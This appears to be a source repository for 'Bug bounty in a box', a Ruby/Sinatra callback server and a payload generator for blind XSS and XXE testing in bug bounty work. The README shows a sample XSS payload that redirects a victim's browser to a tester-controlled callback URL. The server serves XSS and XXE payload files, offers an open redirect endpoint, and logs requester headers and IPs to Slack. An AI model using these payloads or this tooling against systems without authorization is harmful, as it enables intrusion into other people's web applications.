README.md
# :boom: Bug bounty in a box

This repository contains all\* that you should need to get up and running to test for bugs against your targets.

\* Ok, literally not _everything_ but it's a good start!

## :vertical_traffic_light: Project Status

This is by no means "production ready"; there are still some server configuration options that need to be explored before this should be run in production.

### :shipit: To-do list

1. Add more payloads!
1. Add more endpoints!
1. Add "Development" guide

## :running: Quickstart

To get up & hacking, you'll need to:

1. Move the configuration sample: `mv config/application.yml.sample config/application.yml`
1. Edit the `config/application.yml` to your preferences
1. Install the gems: `bundle install`
1. Start the server: `ruby app.rb`
1. Move the payload sample: `mv payloads/xss.yml.sample payloads/xss.yml`
1. Generate the payloads: `ruby generate_payloads.rb --callback=YOUR_SERVER_URL --target=YOUR_TARGET`
1. Use `payloads/xss.txt` in Burp's Intruder (or something similar)
1. Cross your fingers...
1. Profit!

### :whale: Docker Quickstart

_Note: You cannot currently generate payloads with the Docker container. The Docker container only runs the server._

To get up & running in Docker, clone this repository and run the following:

```bash
mv config/application.yml.sample config/application.yml
vim config/application.yml # Edit your config values!
mkdir -p logs
docker build -t bbb . && docker run -d \
-v $(pwd)/config/application.yml:/app/config/application.yml \
-v $(pwd)/logs/:/app/logs/ \
-p 4567:4567 \
-e "APP_ENV=production" \
bbb
```

Then, you should be able to `curl localhost:4567` and see the hello world!

### :globe_with_meridians: Production Quickstart

If you'd like to know how to set up the Bug Bounty in a Box callback server for "production" use, check out [the Wiki](https://github.com/andrewjkerr/bug-bounty-in-a-box/wiki/Running-in-%22production%22).

## :information_desk_person: How does this work?

This "bug bounty in a box" has two different components:
1. A payload callback server
1. A payload generator

### :pager: Callback Server

The callback server, written in Ruby & using [Sinatra](http://sinatrarb.com/), currently has the following capabilities:

* Callback: A callback with a payload & target parameter will log the "callback" to a on-server text log as well as send a Slack message to a Slack webhook. (`/callback`)
* Payloads: A payload file of your choice that will contain your callback URL. (`/payload`)
    * Currently supports:
        * JavaScript (`js`) for XSS
        * SVG (`svg`) for XSS
        * XML (`xml`) for XXE
        * XML (`svg`) for XXE
* Redirect: Redirects to a specified URL in the redirect GET parameter. (`/redirect`)
* Unauthorized: Throws a 401 for non-OPTIONS & non-HEAD requests. Also accepts a content_type parameter to return a specific content type. (`/unauthorized`)

#### Configuring the server

You can configure the server in `config/application.yml`! See below for the different configuration options.

##### Slack

In order to receive Slack callbacks, you'll need to set the appropriate `slack_url`. To generate an incoming webhook for your Slack instance, check out [Slack's Help Center](https://get.slack.help/hc/en-us/articles/115005265063-Incoming-WebHooks-for-Slack).

##### Logging

If you'd like to change either the frequency of the log rotation or the log filenames, check out the configuration file.

### :smiling_imp: Payload Generator

The payload generator uses `.yml` files to generate a `.txt` files that contain a list of payloads that can be used in a tool like Burp Intruder.

#### Running the payload generator

Before running the payload generator, make sure you have some properly formatted `.yml` files in the `payloads` folder! After you've done that, you'll need to run the payload generator with the `--callback` and `--target` flags like such:

```bash
ruby generate_payloads.rb --callback=localhost:4567/callback --target=www.example.com
```

Then, check out the `payloads` folder for the `.txt` file with a list of payloads!

#### Configuring payloads

In order to add a new class of payloads, just create a new `.yml` file with the following:

```yaml
name: XSS
payloads:
  - description: A simple XSS payload
    payload: <script>document.location='CALLBACK_URL'</script>
  - payload: <script>document.location="CALLBACK_URL"</script>
```

The `CALLBACK_URL` will be replaced with whatever is passed in with the `--callback` flag with some added parameters of (1) a callback description & (2) the target.

## :raised_hands: Contributing

Want to contribute? Great! Here's what you do:

1. Fork this repository
1. Push some code to your fork
1. Come back to this repository and open a PR
1. After some review, get that PR merged to master
1. :tada: Thank you for your contribution!!

Feel free to also open an issue with any bugs/comments/requests!


CHANGELOG.md
# :rocket: CHANGELOG

How Bug Bounty in a Box is _currently_ versioned:
* Lil' bug fixes that don't modify any features will be revisionary version releases.
* New features, changes in functionality, or major refactoring will be minor version releases.
* After 1.0, the versioning strategy will change. :smile:

## :banana: Verison 0.04

This mini-release adds a payload for XXE via an SVG file! Anddddd that's it! Nice!

## :relieved: Version 0.03

This lil' release only logs requests for valid, non-index routes 'cause it gets noisy :sweat_smile:. I've also fixed a bug with the SVG & XML payloads.

## :soccer: Version 0.02

This second pre-release version contains some new routes:

1. `/payload`: Will return payload file of your type choice with a callback URL for your Bug Bounty in a Box instance.
    * Includes the following payloads:
        * XSS via JavaScript file
        * XSS via SVG
        * XXE via XML file
1. `/unauthorized`: Sends a 401 for non-OPTIONS & non-HEAD requests with a `Content-Type` header of your choice.

As well as the following changes:

1. Docker container for the server!!
1. Actually log/message the request URI. My b. If you were alreadying parsing request logs, you'll need to account for the fact that the request URI is now the first attribute in the log.
1. Configuration is now loaded on server start instead of first request.
1. Fixed a bug where you couldn't pass in a custom config file location. Sorry about that!
1. Removed some debug `p`s. Whoops.
1. Removed my hardcoded `hack @ ajoekerr` references. Now you won't see me & Juniper in Slack :sweat_smile:.
1. Some doc updates. Nothing huge.

## :dizzy_face: Version 0.01

Initial version! This version includes all of the features that are listed in [the README](https://github.com/andrewjkerr/bug-bounty-in-a-box/blob/5c22b1762b86c2c5d83b9d86024e4dfd52fc01e0/README.md#callback-server).


helpers/slack.rb
# A lil' helper class for sending Slack messages to our Slack endpoint.
module Slack
    # Constants for the various levels of Slack attachments.
    LEVEL_INFO = 'info'
    LEVEL_LOW = 'low'
    LEVEL_MEDIUM = 'medium'
    LEVEL_HIGH = 'high'

    # The different attachment colors for the Slack levels.
    # @return [Hash<String => String> The colors.
    LEVEL_COLORS = {
        LEVEL_INFO => '#6c757d',
        LEVEL_LOW => '#17a2b8',
        LEVEL_MEDIUM => '#ffc107',
        LEVEL_HIGH => '#dc3545',
    }

    # Sends a message to our Slack instance.
    #
    # @param message [String] The message to send.
    # @return [Boolean] Was the send successful?
    def self.send_message!(message)
        resp = HTTParty.post(Config.instance.slack_url,
            body: { text: message }.to_json,
            headers: { 'Content-Type': 'application/json' }
        )

        # Was the message send successful?
        return (resp.code === 200)
    end

    # Sends attachments to our Slack instance.
    #
    # @param attachments [Array, Hash] The attachment to send.
    # @return [Boolean] Was the send successful?
    def self.send_attachment!(attachments)
        # If given a single attachment (a Hash), turn it into an array.
        attachments = [attachments] if attachments.is_a?(Hash)

        resp = HTTParty.post(Config.instance.slack_url,
            body: { 'attachments': attachments }.to_json,
            headers: { 'Content-Type': 'application/json' }
        )

        # Was the message send successful?
        return (resp.code === 200)
    end

    # Formats a Slack attachment to send to our instance.
    #
    # @raise [ArgumentError] If the level is invalid.
    #
    # @param summary [String] The summary of the message.
    # @param fields [Array<Hashes>] The fields of the message.
    # @param level [String] The 'level' of the attachment (i.e. "high", "medium", "low")
    # @return [Hash] The attachment.
    def self.format_attachment(summary, fields, level = 'low')
        raise ArgumentError.new('Invalid level') if LEVEL_COLORS[level].nil?

        return {
            'fallback': summary,
            'color': LEVEL_COLORS[level],
            'pretext': summary,
            'fields': fields,
            'footer': 'bug bounty in a box',
            'footer_icon': 'https://media.giphy.com/media/9WC8WTZsFxkRi/giphy.gif',
        }
    end
end


helpers/config.rb
# A singleton Config class.
#
# Example usage:
# ```
# Config.instance.load!(File.open('config/application.yaml'))
# slack_url = Config.instance.slack_url
# logging_configuration = Config.instance.logging_configuration('classname')
# ```
class Config
    include Singleton

    # The application URL key for the configuration file.
    # @return [String] The application URL.
    APPLICATION_URL_KEY = 'application_url'

    # The Slack URL key for the configuration file.
    # @return [String] The Slack URL configuration key.
    SLACK_URL_KEY = 'slack_url'

    # The application configuration.
    #
    # @return [Hash<Mixed>] The application configuration.
    attr_accessor :config

    # Loads a config file.
    #
    # @raise [Exception] If the configuration file is invalid.
    #
    # @param config_file [String] The contents of the config file.
    # @return [Void]
    def load!(config_file)
        @config = YAML.load(config_file)

        # Ensure the Slack URL key is set.
        if @config[APPLICATION_URL_KEY].nil?
            raise Exception.new("Ruh roh, you need to define a an application URL using #{APPLICATION_URL_KEY} in your configuration!")
        end

        # Ensure the Slack URL key is set.
        if @config[SLACK_URL_KEY].nil?
            raise Exception.new("Ruh roh, you need to define a Slack endpoint using #{SLACK_URL_KEY} in your configuration!")
        end
    end

    # Returns the application URL from the configuration.
    #
    # @return [String] The application URL.
    def application_url
        raise Exception.new('You need to load the configuration before using it.') if @config.nil?

        return @config[APPLICATION_URL_KEY]
    end

    # Returns the logging configuration for a given log.
    #
    # Example usage:
    # ```
    # logging_configuration = Config.instance.logging_configuration('classname')
    # @logger = Logger.new(logging_configuration[:file], logging_configuration[:rotate])
    # ```
    #
    # @raise [ArgumentError] If the logging class does not exist.
    #
    # @param [String] The log.
    # @return [Hash] The logging configuration hash with the file & rotation configuration.
    def logging_configuration(log)
        raise Exception.new('You need to load the configuration before using it.') if @config.nil?

        # Capitalize the log if we're given a string that starts with a lowercase letter.
        class_name = log
        class_name = class_name.capitalize if class_name =~ /^[a-z]/

        logging_class = get_class(class_name)
        raise ArgumentError.new("Logging class does not exist: #{log}") if logging_class.nil?

        # If we don't have a configuration, just return the defaults.
        if @config['logs'].nil? || @config['logs'][log].nil?
            return {
                'file': logging_class::DEFAULT_LOGGING_LOCATION,
                'rotate': logging_class::DEFAULT_LOGGING_ROTATION,
            }
        end

        log_file_location = @config['logs'][log]['file']
        log_file_rotation ||= logging_class::DEFAULT_LOGGING_LOCATION

        log_file_rotation = @config['logs'][log]['rotate']
        log_file_rotation ||= logging_class::DEFAULT_LOGGING_ROTATION

        return {
            'file': log_file_location,
            'rotate': log_file_rotation,
        }
    end

    # Returns the Slack URL from the configuration.
    #
    # @return [String] The Slack URL.
    def slack_url
        raise Exception.new('You need to load the configuration before using it.') if @config.nil?

        return @config[SLACK_URL_KEY]
    end

    private

        # Given a class name, gets the class if it exists.
        #
        # @param class_name [String] The class name.
        # @return [Class, nil] The class or nil.
        def get_class(class_name)
            klass = Module.const_get(class_name)
            return nil unless klass.is_a?(Class)
            return klass
        rescue NameError
            return nil
        end
end


helpers/payload.rb
# A lil' helper class for our payloads; either creating them or logging them.
class Payload
    # The default logging location.
    # @return [String] The default logging location.
    DEFAULT_LOGGING_LOCATION = 'logs/payloads.log'

    # The default logging rotation.
    # @return [String] The default logging rotation.
    DEFAULT_LOGGING_ROTATION = 'daily'

    # The required request paramters to construct a payload.
    # @return [Array] The required request parameters.
    REQUIRED_REQUEST_PARAMETERS = [
        'payload',
        'target',
    ]

    # The payload we're using.
    # @return [String] The payload.
    attr_accessor :payload

    # The target for our payload.
    # @return [String] The target.
    attr_accessor :target

    # Our payload logger.
    # @return [Logger] The logger.
    attr_accessor :logger

    # Creates a new Payload instance.
    #
    # @param payload [String] Our payload.
    # @param target [String] Our target.
    # @return [Payload] Our Payload instance.
    def initialize(payload, target)
        @payload = payload
        @target = target
        logging_configuration = Config.instance.logging_configuration('payload')
        @logger = Logger.new(logging_configuration[:file], logging_configuration[:rotate])
    end

    # Logs a payload & sends a Slack message.
    #
    # @return [Void]
    def log!
        Slack::send_attachment!(format_for_slack)
        @logger.info(summary)
    end

    # Returns a summary for logging.
    #
    # @return [String] The summary.
    def summary
        return "Payload '#{@payload}' fired for #{@target}"
    end

    # Creates a Payload instance from our request parameters.
    #
    # @param params [Array] Our request parameters.
    # @return [Payload, nil] The Payload instance or nil if the required parameters aren't there.
    def self.create_payload_from_request_parameters(params)
        # Our Payload args.
        args = []

        # Run through our required request parameters and return nil if any are missing.
        REQUIRED_REQUEST_PARAMETERS.each do |required_param|
            return nil if params[required_param].nil?
            args << params[required_param]
        end

        return Payload.new(*args)
    end

    private

        # Formats a payload for sending via Slack
        #
        # @return [Hash] Our Payload in Slack "attachment" format.
        def format_for_slack
            fields = [
                {
                    'title': 'Payload',
                    'value': @payload,
                    'short': false,
                },
                {
                    'title': 'Target',
                    'value': @target,
                    'short': false,
                }
            ]

            return Slack::format_attachment(summary, fields, Slack::LEVEL_HIGH)
        end
end


helpers/request.rb
# A lil' helper class for our incoming HTTP requests
class Request
    # The default logging location.
    # @return [String] The default logging location.
    DEFAULT_LOGGING_LOCATION = 'logs/requests.log'

    # The default logging rotation.
    # @return [String] The default logging rotation.
    DEFAULT_LOGGING_ROTATION = 'daily'

    # The current HTTP request we're using.
    # @return [Rack::Request] The request.
    attr_accessor :request

    # Our payload logger.
    # @return [Logger] The logger.
    attr_accessor :logger

    # Creates a new Payload instance.
    #
    # @param payload [String] Our payload.
    # @param target [String] Our target.
    # @return [Payload] Our Payload instance.
    def initialize(request)
        @request = request
        logging_configuration = Config.instance.logging_configuration('request')
        @logger = Logger.new(logging_configuration[:file], logging_configuration[:rotate])
    end

    # Logs a payload & sends a Slack message.
    #
    # @return [Void]
    def log!
        # Log the request to the requests log.
        @logger.info(summary)

        # Send it to Slack.
        Slack::send_attachment!(format_for_slack)
    end

    private

        # Formats a payload for sending via Slack
        #
        # @return [Hash] Our Payload in Slack "attachment" format.
        def format_for_slack
            # Send the request to Slack.
            slack_summary = "New request to #{request_uri}"
            slack_attachment_fields = [
                {
                    'title': 'Request URI',
                    'value': request_uri,
                    'short': false,
                },
                {
                    'title': 'IP Address',
                    'value': ip,
                    'short': false,
                },
                {
                    'title': 'Headers',
                    'value': headers.map{ |k,v| "#{k}: #{v}"}.join("\n"),
                    'short': false,
                },
                {
                    'title': 'Parameters',
                    'value': params.map{ |k,v| "#{k}: #{v}"}.join("\n"),
                    'short': false,
                },
            ]

            # Add target information if we have it!
            unless params['target'].nil?
                slack_summary = "#{slack_summary} from #{params['target']}"
                slack_attachment_fields << {
                    'title': 'Target',
                    'value': params['target'],
                    'short': false,
                }
            end

            # Gotta keep it light & breezy, Peralta.
            slack_summary += "!"

            return Slack::format_attachment(slack_summary, slack_attachment_fields)
        end

        # Gets the headers from a request.
        #
        # @return [Hash] The headers from a request.
        def headers
            return @request.env.select { |k,v| k.start_with? 'HTTP_'}
        end

        # Gets the IP from a request.
        #
        # @return [String] The IP from a request.
        def ip
            return @request.ip
        end

        # Gets the params from a request.
        #
        # @return [Hash] The params from a request.
        def params
            return @request.params
        end

        # Gets the request URI.
        #
        # @return [String] The request URI.
        def request_uri
            return @request.env['REQUEST_URI']
        end

        # Gets the summary for the request for logging.
        #
        # @return [String]
        def summary
            return "Request URI: #{request_uri}\tIP: #{ip}\tHeaders: #{headers}\tParameters: #{params}"
        end
end


generate_payloads.rb
require 'optparse'
require 'ruby-progressbar'
require 'uri'
require 'yaml'

# Parse the options to find the callback & the target.
options = {}
OptionParser.new do |opts|
    opts.banner = 'Usage: generate_payloads.rb [options]'

    opts.on('-c', '--callback BASE_CALLBACK_URL', 'The BASE_CALLBACK_URL for the payloads') do |c|
        options[:callback] = c
    end

    opts.on('-t', '--target TARGET', 'The TARGET for the payloads') do |t|
        options[:target] = t
    end

    opts.on("-h", "--help", "Prints this help") do
        puts opts
        exit
    end
end.parse!

# Check the required arguments.
if options[:callback].nil? || options[:target].nil?
    raise OptionParser::MissingArgument.new('Missing either the callback or target. Use --help for instructions.')
end

payload_files = Dir.glob('payloads/*.yml')

payload_files.each do|filename|
    # Load in the payload's YAML config.
    payload_yaml = YAML.load(File.read(filename))

    puts "Generating payloads for #{payload_yaml['name']}..."

    # Create a new progress bar.
    progress_bar = ProgressBar.create(
        title: "#{payload_yaml['name']}",
        total: payload_yaml['payloads'].length,
    )

    # Create a new output file.
    output = File.open(filename.gsub('.yml', '.txt'), 'w')

    # Go through each of the payload configs and convert them.
    payload_yaml['payloads'].each do |payload_config|
        # We support either a straight up payload or a payload config Hash.
        if payload_config.is_a?(Hash)
            payload = payload_config['payload']
            description = (payload_config['description'].nil? ? payload : payload_config['description'])
        else
            payload = payload_config
            description = payload
        end

        # Generate the query string to append to the callback URL.
        query_string = "payload=#{URI::encode(description)}&target=#{URI::encode(options[:target])}"
        callback_url_for_payload = "#{options[:callback]}?#{query_string}"

        # Add the generated payload to the output file.
        output << payload.gsub('CALLBACK_URL', callback_url_for_payload) + "\n"

        # Increment the progress bar!
        progress_bar.increment
    end

    output.close

    puts "Done!"
end


helpers/content_type.rb
module ContentType
    ##
    # Popular content types from https://stackoverflow.com/a/48704300
    ##

    # Application types
    FORM_URLENCODED = 'application/x-www-form-urlencoded'
    JS = 'application/javascript'
    JAVASCRIPT = 'application/javascript'
    JSON = 'application/json'
    OCTET_STREAM = 'application/octet-stream'
    OGG = 'application/ogg'
    PDF = 'application/pdf'
    XML = 'application/xml'
    ZIP = 'application/zip'

    # Image types
    GIF = 'image/gif'
    JPEG = 'image/jpeg'
    PNG = 'image/png'
    TIFF = 'image/tiff'
    SVG = 'image/svg+xml'

    # Audio types
    AUDIO_MPEG = 'audio/mpeg'
    AUDIO_WAV = 'audio/x-wav'

    # Video types
    VIDEO_MPEG = 'video/mpeg'
    MP4 = 'video/mp4'
    QUICKTIME = 'video/quicktime'
    WEBM = 'video/webm'

    # Etc.
    CSS = 'text/css'
    HTML = 'text/html'
    TEXT_JAVASCRIPT = 'text/javascript'
    MARKDOWN = 'text/markdown'
    RTF = 'text/rtf'
    TEXT = ''
    TEXT_XML = 'text/xml'
end


app.rb
require 'erb'
require 'httparty'
require 'logger'
require 'sinatra'
require 'sinatra/multi_route'
require 'singleton'
require 'uri'
require 'yaml'

require_relative 'helpers/config.rb'
require_relative 'helpers/content_type.rb'
require_relative 'helpers/payload.rb'
require_relative 'helpers/request.rb'
require_relative 'helpers/slack.rb'

# An array of every HTTP method that multi_route supports.
#
# Example usage: `route *ALL_HTTP_METHODS '/example' do`
#
# @return [Array<Symbols>] All of the HTTP methods.
ALL_HTTP_METHODS = [
    :get,
    :post,
    :patch,
    :put,
    :delete,
    :head,
    :options,
]

# The default config file location.
#
# @return [String] The default config file location.
DEFAULT_CONFIG_FILE = 'config/application.yml'

# GET /
#
# A nice lil' "Hello world!" index.
#
# Example: GET /
get '/' do
    'Hello world!'
end

# GET, POST, PUT/PATCH, DELETE, HEAD, OPTIONS /callback
#
# A callback route that:
# 1. Logs the callback parameters
# 2. Alerts in Slack
route *ALL_HTTP_METHODS, '/callback' do
    log_request!

    payload = Payload::create_payload_from_request_parameters(params)
    payload.log! unless payload.nil?
    "Callback successful!\n"
end

# GET, POST, PUT/PATCH, DELETE, HEAD, OPTIONS /payload
#
# A route that returns a payload file.
#
# Required parameters:
# * `type`: The payload type (i.e. 'js').
# * `exploit`: The exploit type (i.e. 'xss').
#
# Example: GET /payload?type=js&exploit=xss&target=www.example.com
route *ALL_HTTP_METHODS, '/payload' do
    log_request!

    halt 400, 'No type provided.' if params['type'].nil?
    halt 400, 'No exploit provided.' if params['exploit'].nil?

    supported_payloads = {
        'xss' => [
            'js',
            'svg',
        ],
        'xxe' => [
            'xml',
            'svg',
        ]
    }

    if supported_payloads[params['exploit']].nil?
        halt 400, "Invalid exploit type provided: #{params['exploit']}"
    end

    unless supported_payloads[params['exploit']].include?(params['type'])
        halt 400, "Invalid type provided: #{params['type']}"
    end

    # Build our callback query string.
    query_string = "?payload=#{params['type']}_file"

    # Add a target if we have one.
    query_string += "&target=#{URI::encode(params['target'])}" unless params['target'].nil?

    # And, finally, build the callback URL!
    @callback_url = Config.instance.application_url + '/callback' + query_string

    # Set the Content-Type header.
    headers['Content-Type'] = ContentType.const_get(params['type'].upcase) + '; charset=UTF-8'

    # Render our payload.
    file_path = "templates/payloads/#{params['exploit']}/payload.#{params['type']}.erb"
    renderer = ERB.new(File.read(file_path))
    renderer.result(binding)
end

# GET, POST, PUT/PATCH, DELETE, HEAD, OPTIONS /redirect
#
# Redirects to the URL specified in the "redirect" parameter.
#
# Required parameters:
# * `redirect`: The URL to redirect to.
route *ALL_HTTP_METHODS, '/redirect' do
    log_request!

    halt 400, 'Empty redirect parameter' if params['redirect'].nil?
    redirect params['redirect']
end

# GET, POST, PUT/PATCH, DELETE, HEAD, OPTIONS /unauthorized
#
# A route that returns a 401 for a given content type. Will return 200 for OPTIONS & HEAD
# unless 'force_401' is set.
#
# Optional parameters:
# * `content_type`: The content type constant name in ContentType.
# * `force_401`: Should we force a 401 for OPTIONS & HEAD requests?
#
# Example: GET /unauthorized?content_type=audio_mpeg
route *ALL_HTTP_METHODS, '/unauthorized' do
    log_request!

    unless params['content_type'].nil?
        content_type_constant = params['content_type'].upcase
        if ContentType.const_defined?(content_type_constant)
            headers['Content-Type'] = ContentType.const_get(content_type_constant)
        end
    end

    # Special processing if it's an OPTIONS or a HEAD.
    if env['REQUEST_METHOD'] == 'OPTIONS' || env['REQUEST_METHOD'] == 'HEAD'
        halt 200, 'Ok' unless params['force_401']
    end

    # Return a 401 Unauthorized
    halt 401
end

helpers do
    # Logs an incoming request & sends a Slack message.
    #
    # @return [Void]
    def log_request!
        @incoming_request = Request.new(request)
        @incoming_request.log!
    end
end

##
# Load our configuration file!
#
# We do this when the server starts to catch any errors on startup. :)
##
config_file_location = DEFAULT_CONFIG_FILE
config_file_location = ARGV[0] unless ARGV[0].nil?

begin
    config_file = File.read(config_file_location)
rescue Exception => e
    puts "Oops, the config file does not exist: #{config_file_location}"
    raise e
end

# Load the config!
Config.instance.load!(config_file)
